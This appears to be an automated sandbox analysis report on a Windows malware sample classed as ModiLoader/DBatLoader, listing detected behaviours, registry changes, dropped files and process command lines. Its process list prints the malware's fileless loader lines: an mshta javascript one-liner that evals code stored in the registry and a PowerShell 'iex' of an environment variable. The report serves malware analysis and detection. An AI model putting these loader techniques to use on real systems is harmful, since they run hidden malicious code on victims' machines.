Analysis Overview
SHA256
70a17f882746bc26e6857b612292d72779adfcef08dbe07125f510a1f6a00767
Threat Level: Known bad
The file 7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
ModiLoader, DBatLoader
Process spawned unexpected child process
ModiLoader Second Stage
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-26 23:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 23:45
Reported
2024-05-26 23:48
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
ModiLoader, DBatLoader
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\mshta.exe | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3420 set thread context of 688 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe hFKbVbXGFgZEbFHOcIE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
- CmdLine Args
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:ZJGUWc1="L";FD1=new%20ActiveXObject("WScript.Shell");dSIpm2X3U="mw7Nqfn";KHQD39=FD1.RegRead("HKLM\\software\\Wow6432Node\\n5XmbnPSb\\rLiYok5b");HXRsFo5ip="xWM4O";eval(KHQD39);CBX9uPS4="KNzKZfXOUy";
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:kuccupa
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNWSNYYcGVY
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4jylg5q.0aq.ps1